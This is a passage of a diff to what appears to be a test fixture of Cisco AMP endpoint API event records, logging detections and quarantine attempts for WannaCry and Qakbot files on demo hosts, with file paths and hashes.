Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} \ No newline 
at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":96000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":862000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine 
Failure","event_type_id":2164260880,"detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":659000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":831000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419275390665097297","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":706000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":643000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419275390665097295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275390665097000,"timestamp":1610645989,"timestamp_nanoseconds":721000000,"date":"2021-01-14T17:39:49+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419275390665097296","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
